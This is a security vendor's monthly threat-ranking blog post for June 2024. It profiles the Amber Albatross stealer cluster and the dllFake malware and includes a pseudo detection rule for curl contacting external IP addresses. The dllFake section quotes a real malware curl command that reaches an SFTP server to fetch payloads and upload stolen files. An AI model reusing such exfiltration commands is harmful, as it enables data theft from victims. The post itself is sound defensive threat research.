Highlights from June
ChromeLoader hit the top spot on our top 10 most prevalent threat list this month, in part due to changes in the way Red Canary detects this threat. ChromeLoader last appeared in the top 10 in October 2023 and was our 6th most prevalent threat for all of 2023
.
Several threats dropped out of the rankings altogether, including Gootloader and PlugX, after many consecutive months in the top 10.
We have two newcomers to our top 10 list this month. Amber Albatross, coming in 4th place, may be new to the rankings but we began tracking it in January 2024. The activity starts with a potentially unwanted program (PUP) and ultimately leads to a pyInstaller executable with stealer capabilities. Read more about Amber Albatross below.
The other newcomer, making its debut on our list as one of our ties for the 6th spot, is dllFake. dllFake is a malware family—first publicly reported and named by Rapid7 in June 2024—that primarily targets browsers and crypto wallets. You can read more about it below.
This month’s Top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for June 2024:
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⬆ 1 | Threat name: | Threat description : Malware that modifies victims’ browser settings and redirects user traffic to advertisement websites |
| Month's rank: ⬇ 2 | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
| Month's rank: ⬆ 3 | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drive |
| Month's rank: ⬆ 4 | Threat name: Amber Albatross | Threat description : Red Canary-named cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities |
| Month's rank: ⬆ 5 | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Month's rank: ⬆ 6* | Threat name: Adload | Threat description : macOS malware that attempts to hijack and redirect user web browsing traffic |
| Month's rank: ⬇ 6* | Threat name: Atomic Stealer | Threat description : Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| Month's rank: ⬆ 6* | Threat name: | Threat description : Penetration testing tool that integrates functionality from multiple offensive security projects and has the ability to extend its functionality with a native scripting language |
| Month's rank: ⬆ 6* | Threat name: dllFake | Threat description : Malware family that can collect keystrokes and steal information from browsers, crypto wallets, and the user's clipboard |
| Month's rank: ⬆ 6* | Threat name: LummaC2 | Threat description : Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
| Month's rank: ⬆ 6* | Threat name: | Threat description : Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
| Month's rank: ⬇ 6* | Threat name: | Threat description : Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Amber Albatross unleashed by PUPs
Amber Albatross is a Red Canary-named activity cluster that begins with a PUP-bundled installation and leads to a pyInstaller executable with stealer-like capabilities. We started observing and tracking Amber Albatross in January 2024.
Amber Albatross is delivered via a setup file downloaded and executed by certain PUPs. We have observed Amber Albatross bundled in downloads from PcAppStore, Bit Guardian’s Bit Driver Updater, and Malware Crusher. The installed PUP executes an installer—sometimes InnoSetup installer—that drops and executes a binary like this one. That binary in turn makes network connections to external sites, for example creaper[.]world or servers-servers-servers[.]com, and downloads additional binaries, ultimately unpacking a pyarmor-obfuscated pyInstaller executable.
This final executable launches via CMD and PowerShell, typically running as a process named with numbers and no extension. We’ve seen it run checks to see if it’s running in a virtual environment, to determine if AV is installed, as well as querying browser and system information. While we cannot at this time discern how Amber Albatross uses this information, we find it suspicious enough to warrant continued tracking and monitoring.
The DL on dllFake
Our second newcomer to the top 10 list this month is dllFake, which we first observed in June 2024. dllFake is a malware family that primarily targets browsers and crypto wallets. It is reportedly distributed by compromised Notezilla, RecentX, and Copywhiz software.
It uses files, including EXE and BAT files with names similar to dllBus.bat and dllCrt32.exe, for initial execution. It creates a scheduled task (one observed taskname was Check dllHourly32) to achieve persistence. dllFake uses curl to reach out to SFTP to download additional payloads and upload collected information, using commands like:
curl.exe -s -k --connect-timeout 30 sftp://104.206.2[.]18:2265/PHN/dll_valid.php?a=26735 --user username:passwordIt looks for TXT, DOC, PNG and JPG files and uploads them back to the SFTP server via curl. The second stage—also downloaded via curl—can copy clipboard data and keystrokes.
The use of curl to download tools and upload data gives us a detection opportunity.
Detection opportunity: curl initiating an external network connection to an IP address
This pseudo detection analytic identifies curl initiating an external network connection to an IP address. Adversaries and malware like dllFake will leverage curl to initiate a network connection to a remote IP address for purposes of writing an additional payload to disk or creating a reverse shell. Administrators may download remote files using similar commands, making it important to validate the IP address and any files written to disk.
process == (curl)
&&
command_line_includes == (<IP address:port>)
&&
command_line_may_include == ( -o )
&&
command_line_does_not_include == (*)
Note: * is a placeholder for strings associated with legitimate use of curl in your environment
In case you missed it: Scarlet Goldfinch leverages NetSupport Manager
Scarlet Goldfinch is a cluster of activity that Red Canary named and first observed in June 2023. This threat deceives users into downloading a file masquerading as a browser update, which starts a chain of activity eventually leading to the installation of NetSupport Manager. NetSupport Manager is a remote monitoring and management (RMM) tool that provides the adversary remote control over a system.
On June 26, Alex Berninger and Red Canary published a blog and video discussing Scarlet Goldfinch, its use of RMM tools, and offering insights into how defenders can protect their organizations from this threat.
The 2024 Threat Detection Report is here!
Related Articles
Stealers evolve to bypass Google Chrome’s new app-bound encryption
Recent dllFake activity shares code with SecondEye